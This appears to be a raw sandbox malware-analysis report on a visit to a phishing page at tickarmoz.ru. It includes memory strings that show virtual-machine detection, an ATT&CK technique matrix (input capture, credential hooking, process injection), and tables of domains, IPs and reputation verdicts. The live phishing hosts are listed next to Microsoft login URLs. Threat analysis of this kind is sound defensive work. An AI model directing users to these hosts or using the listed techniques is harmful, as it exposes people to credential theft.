Source: explorer.exe, 00000014.00000000.2008084492.0000000000B14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000q;
Source: explorer.exe, 00000014.00000000.2022540069.00000000088D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.2429507349.00000000088B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2022540069.0000000008888000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: chrome.exe, 00000000.00000002.2429294924.0000026D7AF64000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
Source: explorer.exe, 00000014.00000000.2022540069.00000000089C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}9d2}i
Source: explorer.exe, 00000014.00000000.2008084492.0000000000B14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: chrome.exe, 00000000.00000002.2425059352.0000026D7AEBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000014.00000000.2022540069.00000000089C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000014.00000000.2022540069.00000000088D7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000014.00000000.2009093682.0000000001111000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000002.2405271103.0000000001111000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.2022540069.00000000089C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000014.00000000.2009093682.0000000001111000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000002.2405271103.000000000111A000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: explorer.exe, 00000014.00000000.2008084492.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.2396339425.0000000000AFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Progman
Source: explorer.exe, 00000014.00000000.2009093682.0000000001111000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000002.2405271103.000000000111A000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: bProgram Manager]
Source: explorer.exe, 00000014.00000000.2009093682.0000000001111000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000002.2405271103.000000000111A000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
2
Process Injection
1
Masquerading
1
Credential API Hooking
1
Security Software Discovery
Remote Services1
Credential API Hooking
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
2
Process Injection
111
Input Capture
1
Process Discovery
Remote Desktop Protocol111
Input Capture
3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading
1
DLL Side-Loading
1
Rundll32
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture5
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://6y.tickarmoz.ru/aY57/100%Avira URL Cloudphishing
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://anglebug.com/5658an0%Avira URL Cloudsafe
https://6y.tickarmoz.ru/favicon.ico100%Avira URL Cloudphishing
http://anglebug.com/8162B0%Avira URL Cloudsafe
http://anglebug.com/3452K0%Avira URL Cloudsafe
http://anglebug.com/6876P0%Avira URL Cloudsafe
https://tickarmoz.ru/0%Avira URL Cloudsafe
https://challenges.cloudflar0%Avira URL Cloudsafe
http://anglebug.com/8215N0%Avira URL Cloudsafe
https://login.microsoftonline.0%Avira URL Cloudsafe
http://anglebug.com/6929J0%Avira URL Cloudsafe
http://anglebug.com/3586D0%Avira URL Cloudsafe
https://accounts.google.0%Avira URL Cloudsafe
http://anglebug.com/8229V0%Avira URL Cloudsafe
http://anglebug.com/3502U0%Avira URL Cloudsafe
http://anglebug.com/3584A0%Avira URL Cloudsafe
https://6y.tickarmoz.ru/100%Avira URL Cloudphishing
http://anglebug.com/6860i0%Avira URL Cloudsafe
http://anglebug.com/5881c0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
6y.tickarmoz.ru
172.67.140.133
truetrue
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      code.jquery.com
      151.101.194.137
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.24.14
        truefalse
          high
          s-part-0036.t-0009.t-msedge.net
          13.107.246.64
          truefalse
            high
            challenges.cloudflare.com
            104.18.94.41
            truefalse
              high
              x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru
              104.21.96.1
              truefalse
                high
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  sni1gl.wpc.omegacdn.net
                  152.199.21.175
                  truefalse
                    high
                    www.google.com
                    142.250.185.68
                    truefalse
                      high
                      www.office.com
                      unknown
                      unknownfalse
                        high
                        identity.nel.measure.office.net
                        unknown
                        unknownfalse
                          high
                          aadcdn.msftauth.net
                          unknown
                          unknownfalse
                            high
                            login.microsoftonline.com
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.jsfalse
                                high
                                https://6y.tickarmoz.ru/favicon.icofalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                  high
                                  https://6y.tickarmoz.ru/aY57/true
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/90211ce78d29726b/1736894272348/101bfdbf082dd482f8356507d292f211b10f12d96672741a8dbd41f11a4bd0ba/p0aOx1kBZtBR-nkfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabchrome.exe, 00000000.00000002.2458927415.000018A800BA0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        https://mail.google.com/mail/?usp=installed_webappchrome.exe, 00000000.00000002.2459145189.000018A800BB0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2448086785.000018A80078D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2473305753.000018A80167D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2473693372.000018A80185C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          https://dl.google.com/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/gonpemdgkjcchrome.exe, 00000000.00000002.2453200711.000018A800980000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/ac/?q=chrome.exe, 00000000.00000002.2458289467.000018A800B6C000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 00000000.00000002.2431278280.000018A800064000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                http://anglebug.com/5658anchrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://dl.google.com/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindggfcjichrome.exe, 00000000.00000002.2453200711.000018A800980000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  http://anglebug.com/8215Nchrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://docs.google.com/document/Jchrome.exe, 00000000.00000002.2448086785.000018A80078D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2473305753.000018A80167D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 00000000.00000002.2447559603.000018A800758000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      http://anglebug.com/4633chrome.exe, 00000000.00000002.2449214207.000018A80080C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        http://anglebug.com/8162Bchrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://anglebug.com/7382chrome.exe, 00000000.00000002.2449214207.000018A80080C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          https://csp.withgoogle.com/csp/clientupdate-aus/1Cache-Control:chrome.exe, 00000000.00000002.2471938430.000018A8011B0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            https://issuetracker.google.com/284462263chrome.exe, 00000000.00000002.2467988706.000018A800FA8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              https://login.microsoftonline.com/common/instrumentation/dssostatuschrome.exe, 00000000.00000002.2436450256.000018A8002A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                https://tickarmoz.ru/chrome.exe, 00000000.00000002.2443966503.000018A80060C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2466733647.000018A800F04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470369026.000018A8010C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477441270.000018A80200C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2458927415.000018A800BA0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://anglebug.com/6876Pchrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEklychrome.exe, 00000000.00000002.2448579620.000018A8007C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2448171740.000018A800798000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://dl.google.com/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eeigpnchrome.exe, 00000000.00000002.2465254973.000018A800E68000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://docs.google.com/document/:chrome.exe, 00000000.00000002.2448086785.000018A80078D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2473305753.000018A80167D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://anglebug.com/3452Kchrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://anglebug.com/7714chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://anglebug.com/6929Jchrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://docs.google.com/presentation/oglchrome.exe, 00000000.00000002.2472710989.000018A801330000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://unisolated.invalid/chrome.exe, 00000000.00000002.2453904830.000018A8009C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://challenges.cloudflarchrome.exe, 00000000.00000002.2471193866.000018A801110000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477728419.000018A80202C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.google.com/chrome/tips/chrome.exe, 00000000.00000002.2452562161.000018A800944000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2448870209.000018A8007E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.google.com/dl/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocncanchrome.exe, 00000000.00000002.2455592885.000018A800A74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://drive.google.com/?lfhs=2chrome.exe, 00000000.00000002.2448086785.000018A80078D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472710989.000018A801330000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2445223137.000018A800678000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://anglebug.com/6248chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://dl.google.com/release2/chrome_component/ads7ltfl2gw6hxwgakn3sxrkoijq_9.53.0/gcmjkmgdlgnkkcocmchrome.exe, 00000000.00000002.2433095021.000018A800120000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://drive.google.com/?lfhs=2ation.Resultchrome.exe, 00000000.00000002.2472710989.000018A801330000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://microsoftonline.com/.com/chrome.exe, 00000000.00000002.2475915429.000018A801DA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://anglebug.com/6929chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://anglebug.com/5281chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://login.microsoftonline.chrome.exe, 00000000.00000002.2478453527.000018A8020F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.google.com/dl/release2/chrome_component/acccxbt6wwsvpxzpob4hojndwkqq_4.10.2830.0/oimompechrome.exe, 00000000.00000002.2453200711.000018A800980000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.youtube.com/?feature=ytcachrome.exe, 00000000.00000002.2448086785.000018A80078D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474760399.000018A801B1C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2445223137.000018A800678000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://anglebug.com/3586Dchrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://accounts.google.chrome.exe, 00000000.00000002.2466370404.000018A800EE5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://issuetracker.google.com/255411748chrome.exe, 00000000.00000002.2467988706.000018A800FA8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 00000000.00000002.2448579620.000018A8007C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2448171740.000018A800798000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.google.com/dl/release2/chrome_component/ads7ltfl2gw6hxwgakn3sxrkoijq_9.53.0/gcmjkmgdlgnkkchrome.exe, 00000000.00000002.2453200711.000018A800980000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://login.microsoftonline.com/n#/chrome.exe, 00000000.00000002.2470923317.000018A8010F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://anglebug.com/7246chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://anglebug.com/7369chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2448579620.000018A8007C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2444217413.000018A80062C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://anglebug.com/8229Vchrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://6y.tickarmoz.ru/chrome.exe, 00000000.00000002.2468589908.000018A800FE4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2454304316.000018A8009E8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2445900193.000018A8006C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2445223137.000018A800678000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477441270.000018A80200C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2471193866.000018A801110000.00000004.00000001.00020000.00000000.sdmptrue
                                                                                                              • Avira URL Cloud: phishing
                                                                                                              unknown
                                                                                                              https://anglebug.com/7489chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://docs.google.com/presentation/chrome.exe, 00000000.00000002.2472710989.000018A801330000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://duckduckgo.com/?q=chrome.exe, 00000000.00000002.2453502017.000018A8009A0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2458927415.000018A800BA0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://dl.google.com/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbogdgmfpkhlaaeachrome.exe, 00000000.00000002.2433095021.000018A800120000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://chrome.google.com/webstorechrome.exe, 00000000.00000002.2443586016.000018A8005E8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2430477894.000018A80000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://microsoftonline.com/gchrome.exe, 00000000.00000002.2475795341.000018A801D7C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://anglebug.com/3502Uchrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://www.google.com/dl/release2/chrome_component/ac6mhlwypzipnufijdvfyhdgvt4q_67/khaoiebndkojlmppechrome.exe, 00000000.00000002.2433095021.000018A800120000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://chrome.google.com/webstore?hl=enKchrome.exe, 00000000.00000002.2443357930.000018A8005D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://dl.google.com/release2/chrome_component/V3P1l2hLvLw_7/7_all_sslErrorAssistant.crx3/chrome.exe, 00000000.00000002.2452562161.000018A800944000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://dl.google.com/release2/chrome_component/V3P1l2hLvLw_7/7_all_sslErrorAssistant.crx3chrome.exe, 00000000.00000002.2452562161.000018A800944000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000000.00000002.2458289467.000018A800B6C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://dl.google.com/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindggfcjchrome.exe, 00000000.00000002.2453200711.000018A800980000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://issuetracker.google.com/161903006chrome.exe, 00000000.00000002.2467988706.000018A800FA8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.ecosia.org/newtab/chrome.exe, 00000000.00000002.2439878582.000018A800480000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.youtube.com/chrome.exe, 00000000.00000002.2474452106.000018A801ADC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://duckduckgo.com/favicon.icochrome.exe, 00000000.00000002.2458927415.000018A800BA0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000000.00000002.2453502017.000018A8009A0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2447559603.000018A800758000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://docs.google.com/spreadsheets/chrome.exe, 00000000.00000002.2434933247.000018A8001D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472710989.000018A801330000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_pchrome.exe, 00000000.00000002.2440596477.000018A8004C8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://microsoftonline.com/chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2449984719.000018A800844000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467162770.000018A800F30000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2433198497.000018A80012C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475915429.000018A801DA4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2440596477.000018A8004C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474452106.000018A801ADC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2436128115.000018A80028C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2476540239.000018A801E0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2468794138.000018A80100C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479453003.000018A80254C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2445223137.000018A800678000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2446869327.000018A800714000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2473981283.000018A80195C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475795341.000018A801D7C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2446439931.000018A8006F0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479546549.000018A802558000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://anglebug.com/3078chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://anglebug.com/7553chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://login.microsoftonline.com/pchrome.exe, 00000000.00000002.2470109322.000018A8010A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://anglebug.com/5375chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_pachrome.exe, 00000000.00000002.2440596477.000018A8004C8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.youtube.com/s/notifications/manifest/cr_install.htmlltchrome.exe, 00000000.00000002.2474823543.000018A801B2C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://anglebug.com/5371chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.google.com/dl/release2/chrome_component/fw4ggtylvtq6i65ti33m4vqijm_2024.12.14.1/kiabhabjchrome.exe, 00000000.00000002.2453200711.000018A800980000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://anglebug.com/4722chrome.exe, 00000000.00000002.2457996373.000018A800B4C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://m.google.com/devicemanagement/data/apichrome.exe, 00000000.00000002.2434933247.000018A8001D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://dl.google.com/release2/chrome_component/gxfxw5tpagw5sjcjp5n3fng72a_2024.12.19.1218/ggkkehgbnfchrome.exe, 00000000.00000002.2453200711.000018A800980000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.office.com/login#lchrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.office.com/login#mchrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://anglebug.com/7556chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.office.com/login#ochrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://chromewebstore.google.com/chrome.exe, 00000000.00000002.2430477894.000018A80000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.youtube.com/?feature=ytcaoglchrome.exe, 00000000.00000002.2474760399.000018A801B1C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://anglebug.com/6860ichrome.exe, 00000000.00000002.2448579620.000018A8007C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://www.google.com/dl/release2/chrome_component/gxfxw5tpagw5sjcjp5n3fng72a_2024.12.19.1218/ggkkehchrome.exe, 00000000.00000002.2455592885.000018A800A74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://clients4.google.com/chrome-syncchrome.exe, 00000000.00000002.2434933247.000018A8001D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
